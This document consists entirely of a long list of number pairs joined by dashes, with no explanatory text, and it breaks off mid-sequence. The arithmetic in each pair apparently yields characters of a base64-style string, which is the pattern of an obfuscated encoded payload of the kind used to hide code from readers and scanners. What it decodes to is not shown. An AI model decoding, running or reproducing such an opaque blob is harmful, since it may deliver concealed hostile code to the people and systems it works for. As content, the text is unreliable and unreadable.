3, 111 – 8, 77 – 4, 106 – 6, 98 – 8, 114 – 5, 91 – 1, 78 – 9, 90 – 7, 106 – 3, 119 – 8, 110 – 2, 79 – 7, 84 – 2, 57 – 8, 88 – 8, 94 – 6, 118 – 9, 87 – 5, 116 – 5, 76 – 4, 89 – 8, 111 – 4, 72 – 1, 82 – 7, 73 – 7, 93 – 4, 76 – 9, 93 – 9, 50 – 1, 81 – 7, 114 – 3, 104 – 7, 113 – 6, 90 – 1, 82 – 7, 70 – 3, 85 – 2, 94 – 9, 90 – 2, 69 – 1, 56 – 8, 61 – 4, 104 – 3, 92 – 2, 75 – 4, 108 – 5, 69 – 1, 66 – 1, 90 – 9, 64 – 8, 122 – 6, 70 – 1, 88 – 6, 93 – 4, 80 – 3, 68 – 3, 87 – 3, 73 – 7, 116 – 5, 92 – 9, 73 – 4, 111 – 7, 83 – 8, 83 – 3, 124 – 4, 124 – 5, 81 – 7, 73 – 8, 111 – 3, 73 – 7, 120 – 9, 104 – 7, 114 – 7, 93 – 4, 84 – 9, 68 – 2, 71 – 4, 110 – 3, 94 – 5, 71 – 2, 85 – 4, 81 – 7, 88 – 7, 99 – 2, 77 – 6, 117 – 5, 79 – 8, 77 – 9, 90 – 8, 70 – 5, 121 – 5, 80 – 8, 128 – 8, 65 – 9, 79 – 2, 71 – 1, 117 – 8, 97 – 7, 114 – 5, 84 – 2, 76 – 7, 116 – 5, 106 – 8, 74 – 1, 126 – 6, 89 – 8, 92 – 6, 80 – 9, 79 – 9, 67 – 1, 115 – 4, 105 – 8, 115 – 8, 91 – 2, 81 – 4, 78 – 6, 85 – 2, 63 – 7, 94 – 5, 79 – 7, 106 – 2, 104 – 1, 85 – 3, 81 – 5, 128 – 7, 55 – 7, 85 – 9, 84 – 1, 109 – 2, 83 – 1, 117 – 2, 87 – 2, 85 – 4, 120 – 1, 70 – 3, 77 – 5, 108 – 2, 70 – 1, 113 – 6, 69 – 1, 88 – 7, 113 – 5, 81 – 6, 90 – 1, 77 – 7, 85 – 7, 92 – 3, 74 – 2, 112 – 9, 102 – 3, 113 – 3, 84 – 4, 126 – 6, 90 – 1, 69 – 3, 85 – 2, 111 – 7, 72 – 2, 77 – 4, 101 – 2, 78 – 7, 105 – 5, 61 – 9, 93 – 3, 73 – 2, 112 – 1, 87 – 9, 71 – 3, 111 – 4, 113 – 9, 109 – 2, 74 – 5, 70 – 4, 81 – 8, 81 – 8, 71 – 2, 89 – 6, 63 – 7, 79 – 5, 76 – 9, 121 – 2, 108 – 9, 76 – 8, 79 – 5, 84 – 2, 94 – 4, 87 – 4, 90 – 8, 75 – 5, 124 – 8, 114 – 7, 78 – 1, 96 – 9, 55 – 2, 81 – 8, 90 – 7, 72 – 1, 123 – 3, 91 – 7, 68 – 1, 70 – 5, 111 – 8, 73 – 2, 83 – 6, 86 – 2, 106 – 3, 79 – 4, 89 – 4, 54 – 4, 75 – 1, 117 – 2, 90 – 5, 120 – 1, 103 – 3, 118 – 8, 87 – 2, 116 – 7, 88 – 7, 63 – 7, 69 – 3, 86 – 4, 114 – 2, 77 – 4, 80 – 1, 90 – 8, 77 – 4, 105 – 5, 76 – 9, 73 – 7, 122 – 3, 122 – 3, 105 – 8, 113 – 5, 117 – 9, 74 – 1, 71 – 5, 111 – 6, 57 – 9, 77 – 7, 74 – 5, 128 – 9, 113 – 2, 93 – 9, 78 – 1, 75 – 8, 90 – 5, 96 – 9, 83 – 1, 107 – 3, 55 – 7, 56 – 9, 76 – 6, 112 – 9, 105 – 2, 123 – 8, 76 – 6, 89 – 6, 74 – 5, 112 – 5, 76 – 7, 77 – 7, 82 – 4, 114 – 9, 100 – 2, 78 – 8, 85 – 8, 91 – 7, 76 – 9, 56 – 7, 79 – 5, 122 – 7, 106 – 9, 124 – 4, 72 – 3, 75 – 1, 73 – 5, 126 – 5, 109 – 2, 105 – 5, 73 – 5, 109 – 2, 49 – 1, 82 – 3, 80 – 1, 75 – 4, 113 – 2, 91 – 9, 76 – 9, 83 – 2, 61 – 5, 117 – 5, 73 – 1, 83 – 2, 61 – 8, 73 – 5, 74 – 2, 111 – 6, 73 – 4, 116 – 9, 72 – 7, 125 – 5, 124 – 5, 71 – 6, 104 – 6, 77 – 8, 60 – 7, 79 – 7, 91 – 7, 91 – 6, 81 – 7, 117 – 1, 104 – 7, 109 – 5, 61 – 4, 108 – 3, 85 – 2, 80 – 9, 128 – 8, 90 – 6, 94 – 7, 109 – 5, 57 – 1, 93 – 5, 83 – 6, 69 – 1, 60 – 4, 93 – 6, 67 – 1, 115 – 7, 86 – 8, 78 – 7, 86 – 1, 55 – 6, 116 – 5, 82 – 1, 109 – 8, 80 – 9, 88 – 6, 118 – 5, 72 – 3, 84 – 3, 112 – 5, 86 – 6, 77 – 2, 91 – 9, 51 – 3, 87 – 8, 92 – 8, 94 – 9, 61 – 4, 110 – 3, 85 – 5, 128 – 9, 90 – 5, 83 – 3, 74 – 6, 88 – 5, 79 – 6, 77 – 5, 92 – 6, 67 – 1, 112 – 5, 104 – 4, 73 – 6, 72 – 5, 89 – 4, 86 – 2, 70 – 2, 88 – 6, 117 – 6, 88 – 8, 78 – 9, 107 – 4, 113 – 6, 76 – 3, 94 – 7, 113 – 4, 54 – 5, 123 – 3, 101 – 3, 109 – 2, 109 – 5, 78 – 5, 79 – 5, 84 – 2, 89 – 3, 101 – 4, 88 – 6, 87 – 6, 100 – 1, 115 – 7, 82 – 6, 87 – 6, 78 – 9, 78 – 7, 75 – 3, 72 – 1, 76 – 3, 101 – 4, 78 – 8, 69 – 4, 113 – 6, 95 – 7, 85 – 5, 70 – 5, 93 – 8, 70 – 3, 83 – 2, 72 – 3, 63 – 7, 117 – 3, 74 – 2, 67 – 1, 90 – 5, 82 – 7, 74 – 2, 106 – 1, 75 – 5, 119 – 3, 92 – 8, 93 – 8, 105 – 1, 79 – 5, 103 – 4, 91 – 5, 82 – 4, 89 – 1, 97 – 9, 78 – 8, 75 – 2, 54 – 2, 82 – 4, 113 – 6, 85 – 4, 103 – 3, 71 – 4, 84 – 1, 124 – 9, 94 – 7, 71 – 1, 67 – 1, 109 – 1, 108 – 9, 83 – 7, 88 – 5, 83 – 2, 68 – 3, 73 – 5, 89 – 7, 73 – 8, 69 – 1, 78 – 8, 89 – 3, 75 – 1, 81 – 6, 75 – 6, 73 – 6, 116 – 1, 45 – 2, 87 – 6, 51 – 3, 75 – 5, 81 – 8, 101 – 3, 89 – 4, 62 – 9, 102 – 5, 87 – 6, 75 – 6, 79 – 1, 81 – 2, 106 – 9, 111 – 4, 84 – 2, 76 – 3, 88 – 5, 76 – 5, 122 – 2, 91 – 7, 71 – 5, 107 – 3, 79 – 9, 86 – 3, 85 – 8, 91 – 8, 118 – 3, 69 – 1, 72 – 4, 89 – 8, 95 – 6, 54 – 2, 90 – 2, 87 – 5, 85 – 8, 72 – 4, 79 – 9, 113 – 8, 75 – 6, 130 – 9, 80 – 5, 125 – 6, 62 – 9, 67 – 2, 103 – 6, 121 – 1, 74 – 9, 74 – 1, 76 – 8, 72 – 7, 93 – 8, 116 – 5, 105 – 7, 92 – 7, 50 – 1, 76 – 3, 89 – 6, 96 – 8, 76 – 6, 88 – 4, 87 – 1, 58 – 9, 121 – 1, 104 – 6, 91 – 1, 72 – 4, 76 – 6, 118 – 1, 96 – 7, 113 – 6, 113 – 9, 116 – 1, 76 – 8, 115 – 7, 118 – 7, 79 – 6, 79 – 7, 115 – 9, 108 – 9, 120 – 2, 90 – 8, 67 – 1, 86 – 8, 106 – 1, 102 – 4, 79 – 9, 81 – 3, 106 – 9, 86 – 2, 87 – 5, 112 – 1, 117 – 1, 82 – 6, 109 – 6, 72 – 3, 55 – 8, 73 – 5, 85 – 2, 56 – 4, 110 – 7, 70 – 1, 126 – 6, 111 – 4, 95 – 7, 101 – 3, 79 – 8, 80 – 2, 110 – 8, 93 – 4, 109 – 2, 108 – 4, 121 – 6, 73 – 5, 111 – 1, 68 – 2, 113 – 3, 92 – 7, 118 – 9, 89 – 8, 118 – 3, 70 – 1, 89 – 8, 94 – 5, 82 – 6, 81 – 2, 71 – 5, 120 – 9, 90 – 4, 73 – 8, 50 – 1, 81 – 8, 115 – 9, 82 – 6, 121 – 1, 72 – 7, 115 – 1, 68 – 2, 130 – 9, 79 – 2, 93 – 4, 75 – 6, 121 – 2, 111 – 7, 99 – 2, 82 – 8, 124 – 4, 93 – 8, 78 – 3, 70 – 3, 82 – 1, 87 – 2, 114 – 2, 95 – 8, 117 – 9, 119 – 8, 90 – 3, 103 – 2, 80 – 9, 89 – 7, 121 – 8, 87 – 5, 70 – 1, 110 – 7, 102 – 1, 79 – 3, 88 – 7, 73 – 3, 101 – 4, 71 – 3, 108 – 3, 53 – 5, 123 – 2, 79 – 4, 128 – 9, 106 – 3, 105 – 5, 71 – 3, 94 – 7, 122 – 2, 80 – 1, 89 – 2, 110 – 7, 109 – 2, 108 – 8, 81 – 7, 128 – 6, 62 – 6, 81 – 7, 70 – 2, 82 – 1, 96 – 7, 60 – 8, 89 – 1, 87 – 5, 116 – 9, 68 – 1, 78 – 6, 87 – 4, 59 – 3, 110 – 4, 67 – 2, 87 – 1, 85 – 7, 111 – 6, 104 – 6, 79 – 9, 85 – 7, 103 – 6, 92 – 8, 88 – 7, 83 – 2, 116 – 8, 80 – 1, 73 – 4, 83 – 2, 81 – 5, 87 – 9, 124 – 2, 57 – 1, 78 – 6, 79 – 8, 129 – 9, 63 – 7, 72 – 1, 98 – 8, 80 – 8, 104 – 4, 73 – 4, 72 – 5, 126 – 4, 105 – 6, 57 – 3, 76 – 7, 107 – 3, 93 – 4, 92 – 3, 72 – 2, 53 – 3, 119 – 8, 109 – 3, 75 – 8, 112 – 9, 121 – 2, 84 – 6, 87 – 9, 72 – 4, 121 – 2, 100 – 1, 84 – 2, 95 – 9, 69 – 3, 111 – 4, 104 – 7, 72 – 3, 84 – 2, 72 – 4, 86 – 3, 73 – 6, 61 – 5, 118 – 3, 71 – 1, 67 – 2, 126 – 7, 105 – 3, 81 – 8, 94 – 7, 116 – 4, 89 – 9, 88 – 5, 70 – 1, 114 – 2, 126 – 6, 92 – 7, 87 – 1, 82 – 4, 96 – 9, 104 – 3, 72 – 1, 84 – 2, 121 – 8, 88 – 6, 72 – 3, 106 – 3, 67 – 1, 77 – 2, 110 – 2, 85 – 7, 92 – 9, 69 – 1, 111 – 6, 52 – 4, 55 – 4, 86 – 6, 109 – 6, 86 – 1, 104 – 7, 76 – 4, 77 – 6, 125 – 5, 82 – 3, 91 – 9, 49 – 1, 53 – 4, 105 – 3, 101 – 1, 93 – 6, 81 – 3, 76 – 7, 78 – 9, 56 – 6, 75 – 1, 116 – 1, 86 – 1, 57 – 8, 117 – 5, 84 – 6, 93 – 8, 117 – 8, 83 – 2, 116 – 4, 87 – 8, 123 – 3, 122 – 7, 105 – 6, 83 – 7, 87 – 6, 74 – 5, 82 – 3, 88 – 4, 89 – 4, 58 – 1, 108 – 1, 76 – 1, 88 – 4, 124 – 9, 108 – 7, 71 – 4, 91 – 8, 68 – 3, 79 – 8, 73 – 1, 49 – 1, 82 – 5, 99 – 1, 82 – 7, 113 – 8, 59 – 7, 71 – 5, 72 – 3, 69 – 2, 105 – 6, 117 – 4, 90 – 3, 123 – 3, 114 – 7, 126 – 5, 80 – 8, 74 – 7, 91 – 6, 116 – 6, 70 – 5, 91 – 6, 110 – 6, 77 – 9, 106 – 8, 73 – 3, 74 – 4, 79 – 7, 93 – 9, 53 – 4, 119 – 3, 53 – 6, 83 – 2, 75 – 6, 90 – 8, 81 – 8, 91 – 8, 78 – 7, 125 – 6, 88 – 9, 106 – 7, 74 – 5, 58 – 9, 92 – 9, 91 – 1, 78 – 7, 117 – 6, 82 – 4, 77 – 9, 109 – 2, 107 – 3, 110 – 3, 75 – 6, 70 – 3, 88 – 3, 108 – 7, 67 – 1, 107 – 2, 86 – 1, 56 – 4, 72 – 3, 73 – 4, 108 – 4, 93 – 7, 102 – 3, 89 – 3, 85 – 7, 97 – 9, 95 – 7, 78 – 8, 124 – 8, 113 – 6, 82 – 5, 93 – 6, 62 – 9, 74 – 1, 84 – 1, 78 – 7, 129 – 9, 87 – 3, 96 – 9, 115 – 8, 57 – 9, 83 – 1, 78 – 7, 127 – 5, 124 – 5, 77 – 7, 75 – 9, 67 – 1, 56 – 8, 121 – 9, 86 – 1, 55 – 7, 101 – 1, 79 – 1, 75 – 3, 74 – 6, 71 – 2, 116 – 7, 69 – 2, 78 – 8, 87 – 9, 111 – 6, 105 – 7, 79 – 9, 82 – 4, 102 – 5, 90 – 6, 85 – 4, 58 – 1, 80 – 1, 102 – 5, 116 – 9, 89 – 7, 82 – 9, 86 – 3, 73 – 6, 108 – 1, 108 – 6, 74 – 7, 87 – 6, 107 – 3, 91 – 8, 89 – 9, 53 – 5, 75 – 9, 77 – 8, 91 – 8, 70 – 1, 111 – 7, 117 – 2, 90 – 5, 50 – 1, 114 – 3, 85 – 6, 85 – 9, 87 – 3, 106 – 7, 47 – 4, 71 – 5, 87 – 5, 117 – 6, 108 – 9, 99 – 1, 71 – 2, 54 – 1, 103 – 6, 77 – 9, 114 – 9, 53 – 5, 124 – 3, 81 – 6, 125 – 6, 110 – 7, 106 – 6, 74 – 6, 88 – 1, 81 – 8, 100 – 3, 76 – 6, 72 – 7, 109 – 2, 97 – 9, 85 – 5, 66 – 1, 91 – 6, 72 – 5, 82 – 1, 71 – 2, 113 – 1, 123 – 3, 94 – 9, 95 – 9, 91 – 1, 83 – 5, 73 – 4, 86 – 4, 123 – 8, 61 – 8, 74 – 5, 73 – 8, 110 – 3, 103 – 6, 83 – 4, 76 – 6, 117 – 5, 98 – 1, 87 – 5, 117 – 9, 82 – 8, 55 – 6, 103 – 4, 92 – 5, 56 – 3, 78 – 5, 87 – 4, 76 – 5, 123 – 3, 87 – 3, 89 – 2, 114 – 7, 56 – 8, 70 – 1, 75 – 1, 88 – 4, 112 – 8, 74 – 5, 68 – 1, 126 – 4, 100 – 1, 120 – 8, 75 – 3, 83 – 1, 60 – 7, 80 – 2, 88 – 4, 51 – 1, 87 – 6, 113 – 1, 87 – 8, 129 – 9, 59 – 7, 80 – 6, 78 – 5, 68 – 3, 90 – 1, 110 – 8, 83 – 2, 123 – 3, 123 – 8, 118 – 5, 79 – 3, 112 – 9, 78 – 9, 86 – 5, 82 – 8, 126 – 5, 115 – 3, 100 – 2, 91 – 4, 75 – 5, 95 – 5, 82 – 1, 102 – 5, 72 – 1, 116 – 5, 79 – 7, 82 – 4, 129 – 9, 118 – 3, 58 – 6, 78 – 9, 110 – 7, 110 – 7, 91 – 1, 91 – 4, 54 – 3, 64 – 7, 71 – 6, 88 – 6, 71 – 2, 110 – 6, 80 – 7, 99 – 1, 74 – 4, 85 – 7, 104 – 7, 75 – 9, 72 – 6, 84 – 2, 116 – 9, 91 – 2, 104 – 1, 107 – 8, 52 – 1, 76 – 8, 91 – 8, 79 – 6, 93 – 5, 94 – 7, 110 – 2, 69 – 3, 89 – 9, 96 – 6, 77 – 6, 106 – 6, 91 – 5, 86 – 5, 94 – 9, 110 – 7, 57 – 6, 103 – 2, 94 – 8, 113 – 1, 85 – 7, 87 – 2, 111 – 2, 86 – 4, 117 – 4, 91 – 9, 75 – 6, 113 – 9, 81 – 8, 80 – 4, 127 – 6, 126 – 7, 103 – 1, 70 – 5, 127 – 7, 98 – 8, 108 – 1, 105 – 5, 54 – 6, 85 – 4, 79 – 3, 83 – 5, 130 – 8, 115 – 4, 85 – 2, 77 – 7, 107 – 3, 107 – 4, 97 – 9, 99 – 2, 109 – 4, 97 – 8, 69 – 3, 67 – 1, 111 – 8, 62 – 6, 60 – 8, 76 – 5, 49 – 1, 74 – 4, 112 – 2, 94 – 9, 115 – 6, 85 – 3, 120 – 7, 85 – 3, 72 – 3, 106 – 2, 77 – 4, 83 – 6, 97 – 9, 111 – 3, 98 – 1, 93 – 9, 91 – 5, 75 – 1, 113 – 6, 99 – 2, 111 – 4, 85 – 4, 78 – 2, 81 – 3, 127 – 5, 116 – 5, 88 – 5, 78 – 8, 112 – 8, 107 – 4, 93 – 5, 99 – 9, 79 – 7, 101 – 1, 75 – 6, 74 – 2, 82 – 1, 90 – 1, 119 – 7, 68 – 3, 71 – 5, 110 – 3, 86 – 9, 67 – 2, 108 – 3, 72 – 2, 114 – 9, 71 – 5, 128 – 6, 101 – 2, 108 – 7, 83 – 7, 84 – 2, 65 – 9, 86 – 6, 75 – 8, 73 – 3, 120 – 1, 54 – 3, 81 – 1, 124 – 5, 96 – 7, 107 – 9, 79 – 7, 71 – 3, 59 – 7, 99 – 2, 76 – 6, 66 – 1, 116 – 4, 104 – 7, 82 – 8, 122 – 2, 87 – 2, 92 – 4, 73 – 1, 71 – 6, 114 – 7, 50 – 7, 75 – 9, 52 – 3, 91 – 1, 79 – 1, 77 – 8, 90 – 8, 119 – 4, 121 – 3, 71 – 4, 110 – 7, 125 – 5, 70 – 4, 98 – 8, 92 – 7, 105 – 1, 127 – 8, 91 – 7, 91 – 5, 75 – 1, 113 – 6, 104 – 7, 109 – 5, 113 – 5, 106 – 1, 91 – 8, 76 – 5, 129 – 9, 86 – 2, 92 – 5, 113 – 9, 63 – 7, 91 – 3, 82 – 5, 69 – 1, 60 – 4, 96 – 9, 71 – 5, 110 – 3, 108 – 5, 120 – 2, 77 – 1, 67 – 2, 123 – 4, 84 – 7, 81 – 9, 108 – 2, 75 – 6, 119 – 1, 94 – 6, 51 – 1, 79 – 5, 78 – 5, 101 – 3, 74 – 9, 61 – 8, 124 – 5, 94 – 4, 53 – 4, 81 – 7, 108 – 1, 77 – 1, 70 – 4, 73 – 4, 73 – 2, 69 – 2, 123 – 1, 104 – 1, 105 – 8, 72 – 2, 82 – 1, 80 – 2, 92 – 9, 79 – 1, 128 – 7, 65 – 9, 86 – 5, 78 – 3, 120 – 1, 104 – 5, 113 – 7, 72 – 1, 71 – 5, 80 – 3, 79 – 6, 96 – 9, 110 – 5, 105 – 6, 93 – 7, 72 – 5, 108 – 5, 113 – 6, 74 – 4, 80 – 5, 92 – 6, 66 – 9, 104 – 7, 76 – 5, 127 – 7, 83 – 6, 118 – 7, 88 – 8, 123 – 4, 74 – 4, 77 – 8, 92 – 9, 69 – 2, 108 – 1, 83 – 7, 81 – 9, 110 – 7, 123 – 4, 77 – 1, 79 – 1, 51 – 1, 84 – 6, 75 – 6, 73 – 4, 58 – 8, 78 – 4, 123 – 8, 89 – 4, 58 – 9, 120 – 8, 80 – 2, 74 – 8, 73 – 6, 92 – 7, 55 – 3, 91 – 9, 72 – 7, 57 – 9, 85 – 4, 76 – 1, 74 – 8, 81 – 8, 83 – 4, 71 – 4, 71 – 1, 83 – 9, 59 – 6, 98 – 1, 105 – 2, 119 – 8, 81 – 3, 76 – 4, 58 – 8, 126 – 7, 56 – 5, 74 – 3, 128 – 8, 109 – 2, 96 – 8, 100 – 2, 79 – 8, 79 – 1, 109 – 7, 92 – 3, 113 – 6, 105 – 1, 123 – 8, 94 – 9, 55 – 6, 113 – 2, 81 – 8, 71 – 4, 106 – 1, 73 – 8, 119 – 5, 75 – 6, 69 – 4, 52 – 3, 77 – 6, 88 – 8, 125 – 5, 91 – 2, 83 – 4, 81 – 6, 87 – 5, 78 – 1, 121 – 2, 82 – 6, 54 – 6, 124 – 5, 80 – 2, 75 – 6, 68 – 1, 106 – 3, 89 – 6, 70 – 2, 106 – 3, 113 – 9, 101 – 2, 82 – 9, 127 – 6, 57 – 1, 83 – 2, 79 – 3, 74 – 9, 115 – 8, 59 – 7, 72 – 2, 109 – 1, 82 – 8, 75 – 6, 94 – 9, 111 – 2, 59 – 2, 117 – 4, 67 – 2, 87 – 5, 72 – 7, 83 – 6, 82 – 6, 82 – 1, 118 – 7, 79 – 5, 83 – 1, 71 – 2, 113 – 5, 80 – 1, 98 – 1, 108 – 1, 87 – 5, 78 – 5, 90 – 7, 73 – 5, 112 – 1, 85 – 2, 68 – 1, 73 – 4, 51 – 3, 85 – 3, 72 – 1, 129 – 7, 120 – 1, 75 – 5, 75 – 9, 70 – 4, 54 – 6, 120 – 8, 88 – 3, 49 – 1, 108 – 8, 81 – 3, 71 – 1, 124 – 2, 106 – 7, 114 – 2, 71 – 5, 85 – 3, 109 – 6, 85 – 7, 96 – 6, 74 – 9, 86 – 1, 104 – 6, 69 – 4, 86 – 5, 106 – 7, 113 – 9, 90 – 1, 50 – 2, 87 – 5, 71 – 3, 90 – 7, 75 – 4, 86 – 4, 103 – 5, 77 – 5, 126 – 6, 94 – 9, 96 – 9, 80 – 6, 93 – 9, 82 – 5, 90 – 2, 88 – 5, 77 – 7, 94 – 8, 123 – 3, 93 – 8, 123 – 3, 88 – 7, 96 – 7, 74 – 2, 112 – 7, 107 – 3, 115 – 9, 91 – 9, 71 – 1, 105 – 5, 79 – 6, 101 – 3, 114 – 6, 79 – 9, 100 – 3, 95 – 9, 52 – 3, 82 – 8, 110 – 1, 107 – 8, 89 – 4, 82 – 1, 81 – 3, 78 – 9, 70 – 2, 126 – 7, 104 – 7, 69 – 2, 68 – 3, 111 – 8, 75 – 9, 103 – 2, 93 – 6, 108 – 4, 71 – 2, 85 – 4, 51 – 3, 106 – 3, 113 – 1, 74 – 7, 124 – 4, 55 – 3, 78 – 1, 74 – 8, 106 – 1, 78 – 8, 111 – 4, 71 – 2, 69 – 4, 104 – 5, 66 – 9, 77 – 6, 75 – 7, 74 – 9, 115 – 3, 77 – 6, 90 – 9, 74 – 9, 123 – 7, 75 – 1, 69 – 4, 81 – 3, 74 – 9, 87 – 6, 89 – 2, 89 – 3, 78 – 5, 102 – 3, 76 – 7, 52 – 3, 90 – 7, 91 – 1, 73 – 2, 120 – 9, 66 – 1, 72 – 6, 125 – 6, 120 – 5, 54 – 1, 80 – 8, 111 – 7, 62 – 6, 76 – 8, 71 – 5, 116 – 7, 116 – 5, 113 – 1, 69 – 2, 123 – 4, 101 – 2, 73 – 5, 81 – 7, 83 – 1, 91 – 1, 98 – 1, 91 – 6, 74 – 4, 74 – 1, 119 – 9, 72 – 2, 82 – 1, 112 – 1, 79 – 5, 69 – 3, 85 – 2, 116 – 8, 86 – 2, 89 – 4, 92 – 7, 52 – 3, 84 – 3, 108 – 7, 92 – 5, 111 – 7, 71 – 2, 84 – 3, 54 – 6, 108 – 5, 127 – 9, 80 – 4, 72 – 7, 123 – 4, 83 – 6, 78 – 6, 112 – 6, 77 – 8, 125 – 7, 90 – 2, 58 – 8, 78 – 4, 77 – 4, 106 – 8, 74 – 9, 61 – 8, 122 – 3, 97 – 7, 50 – 1, 79 – 5, 116 – 9, 82 – 6, 71 – 5, 73 – 4, 80 – 9, 76 – 9, 127 – 5, 105 – 2, 106 – 9, 72 – 2, 90 – 9, 84 – 6, 92 – 9, 79 – 5, 130 – 9, 82 – 9, 71 – 5, 76 – 9, 123 – 4, 80 – 3, 81 – 1, 75 – 3, 71 – 5, 88 – 3, 74 – 3, 75 – 4, 129 – 8, 79 – 9, 110 – 5, 87 – 3, 88 – 3, 108 – 5, 93 – 9, 88 – 6, 111 – 3, 79 – 1, 106 – 9, 90 – 6, 87 – 1, 79 – 6, 119 – 3, 78 – 2, 74 – 5, 91 – 9, 68 – 3, 72 – 6, 73 – 6, 86 – 9, 85 – 4, 77 – 6, 127 – 8, 73 – 4, 109 – 5, 86 – 9, 68 – 1, 88 – 3, 88 – 1, 74 – 7, 89 – 8, 63 – 7, 119 – 7, 97 – 9, 86 – 4, 54 – 6, 75 – 2, 72 – 6, 107 – 4, 53 – 5, 47 – 4, 73 – 8, 85 – 4, 94 – 8, 68 – 3, 101 – 4, 121 – 2, 120 – 9, 111 – 5, 68 – 2, 126 – 7, 70 – 5, 116 – 8, 108 – 6, 113 – 7, 86 – 5, 117 – 3, 72 – 5, 60 – 9, 87 – 6, 91 – 2, 78 – 8, 124 – 3, 65 – 9, 61 – 7, 79 – 6, 85 – 1, 110 – 3, 97 – 9, 95 – 8, 88 – 7, 76 – 7, 119 – 2, 92 – 6, 73 – 3, 82 – 4, 80 – 2, 86 – 2, 56 – 5, 109 – 1, 54 – 3, 83 – 1, 71 – 2, 62 – 5, 93 – 3, 99 – 2, 54 – 5, 115 – 3, 99 – 2, 78 – 8, 119 – 9, 107 – 3, 115 – 8, 106 – 9, 115 – 8, 84 – 2, 79 – 6, 84 – 1, 72 – 1, 121 – 2, 71 – 5, 81 – 9, 125 – 5, 111 – 4, 81 – 9, 79 – 1, 106 – 1, 89 – 7, 75 – 6, 73 – 1, 73 – 7, 113 – 2, 58 – 5, 73 – 3, 114 – 7, 72 – 2, 112 – 2, 92 – 7, 110 – 1, 90 – 8, 114 – 1, 84 – 2, 67 – 1, 95 – 9, 82 – 9, 84 – 9, 91 – 9, 62 – 6, 76 – 2, 74 – 7, 74 – 4, 77 – 4, 53 – 6, 85 – 4, 77 – 8, 84 – 2, 78 – 5, 85 – 2, 76 – 5, 125 – 5, 86 – 2, 95 – 8, 107 – 4, 71 – 2, 101 – 1, 81 – 7, 123 – 2, 118 – 3, 79 – 6, 86 – 7, 123 – 3, 127 – 8, 107 – 1, 73 – 8, 89 – 7, 118 – 3, 80 – 5, 75 – 5, 52 – 2, 119 – 8, 61 – 8, 67 – 2, 90 – 8, 124 – 5, 111 – 7, 87 – 8, 75 – 9, 93 – 4, 93 – 5, 90 – 8, 94 – 8, 87 – 2, 64 – 7, 77 – 8, 123 – 4, 55 – 3, 102 – 5, 69 – 2, 94 – 6, 111 – 8, 109 – 3, 86 – 7, 85 – 4, 60 – 7, 76 – 1, 81 – 5, 127 – 6, 102 – 3, 110 – 1, 77 – 4, 73 – 8, 52 – 4, 55 – 8, 66 – 1, 76 – 7, 121 – 6, 75 – 6, 72 – 3, 78 – 7, 84 – 6, 111 – 2, 87 – 5, 75 – 6, 62 – 5, 95 – 5, 98 – 1, 57 – 8, 119 – 7, 70 – 4, 99 – 9, 54 – 5, 77 – 3, 113 – 6, 106 – 9, 114 – 7, 86 – 5, 89 – 3, 97 – 8, 110 – 1, 127 – 7, 86 – 2, 90 – 3, 116 – 9, 50 – 2, 78 – 9, 82 – 8, 91 – 7, 111 – 7, 75 – 6, 75 – 4, 109 – 6, 53 – 5, 119 – 6, 73 – 3, 111 – 8, 105 – 2, 108 – 6, 75 – 5, 130 – 8, 98 – 9, 97 – 8, 66 – 1, 89 – 8, 125 – 6, 72 – 6, 82 – 2, 105 – 1, 98 – 9, 94 – 4, 79 – 8, 92 – 8, 74 – 5, 116 – 2, 79 – 5, 82 – 1, 57 – 1, 70 – 4, 74 – 6, 96 – 9, 123 – 3, 83 – 4, 96 – 9, 111 – 8, 119 – 8, 89 – 1, 79 – 2, 73 – 8, 114 – 7, 83 – 7, 68 – 2, 124 – 5, 82 – 5, 112 – 4, 71 – 1, 109 – 1, 81 – 7, 89 – 9, 72 – 7, 70 – 3, 77 – 8, 123 – 8, 66 – 1, 83 – 1, 114 – 3, 100 – 3, 81 – 6, 85 – 4, 72 – 3, 116 – 5, 74 – 7, 69 – 3, 92 – 3, 125 – 9, 81 – 2, 74 – 9, 73 – 4, 78 – 2, 80 – 8, 68 – 3, 58 – 2, 105 – 6, 76 – 6, 84 – 3, 92 – 3, 101 – 3, 76 – 3, 95 – 8, 111 – 7, 80 – 2, 87 – 2, 53 – 3, 80 – 6, 122 – 7, 94 – 9, 54 – 5, 115 – 3, 79 – 1, 73 – 2, 122 – 1, 76 – 2, 118 – 5, 85 – 1, 71 – 5, 115 – 4, 81 – 3, 77 – 2, 105 – 1, 97 – 8, 74 – 1, 73 – 1, 121 – 1, 105 – 6, 53 – 3, 75 – 4, 71 – 6, 70 – 1, 79 – 2, 70 – 5, 87 – 3, 60 – 8, 91 – 4, 75 – 4, 89 – 7, 115 – 8, 128 – 8, 76 – 1, 127 – 6, 87 – 2, 88 – 8, 67 – 2, 88 – 7, 51 – 2, 122 – 7, 93 – 8, 110 – 3, 105 – 5, 84 – 6, 74 – 2, 77 – 9, 71 – 2, 113 – 4, 68 – 1, 77 – 8, 106 – 2, 85 – 6, 106 – 9, 111 – 3, 78 – 1, 74 – 1, 73 – 6, 68 – 2, 89 – 8, 112 – 8, 87 – 8, 70 – 4, 98 – 9, 80 – 2, 74 – 3, 105 – 1, 55 – 3, 95 – 8, 76 – 4, 108 – 5, 89 – 8, 74 – 9, 77 – 4, 87 – 4, 111 – 4, 85 – 4, 77 – 2, 128 – 9, 103 – 4, 115 – 9, 72 – 1, 68 – 2, 83 – 6, 76 – 3, 92 – 7, 110 – 1, 94 – 8, 56 – 5, 87 – 5, 78 – 9, 119 – 7, 80 – 5, 94 – 4, 92 – 6, 80 – 3, 73 – 7, 94 – 4, 54 – 5, 83 – 9, 113 – 6, 104 – 7, 112 – 5, 84 – 2, 74 – 1, 84 – 1, 69 – 1, 55 – 3, 95 – 8, 75 – 7, 105 – 1, 108 – 5, 66 – 1, 83 – 8, 118 – 9, 118 – 7, 85 – 4, 75 – 4, 107 – 3, 55 – 7, 121 – 9, 89 – 6, 81 – 9, 74 – 8, 87 – 9, 89 – 4, 113 – 4, 87 – 5, 121 – 8, 77 – 6, 91 – 6, 108 – 5, 80 – 2, 79 – 6, 69 – 4, 72 – 7, 109 – 7, 85 – 1, 83 – 1, 116 – 1, 114 – 9, 106 – 9, 116 – 9, 128 – 9, 83 – 6, 71 – 5, 126 – 5, 64 – 8, 78 – 7, 73 – 3, 124 – 5, 107 – 4, 106 – 7, 83 – 6, 78 – 7, 90 – 9, 75 – 3, 74 – 8, 128 – 9, 106 – 7, 116 – 6, 72 – 1, 111 – 7, 61 – 4, 70 – 2, 76 – 5, 126 – 5, 113 – 2, 122 – 5, 67 – 2, 86 – 4, 72 – 7, 116 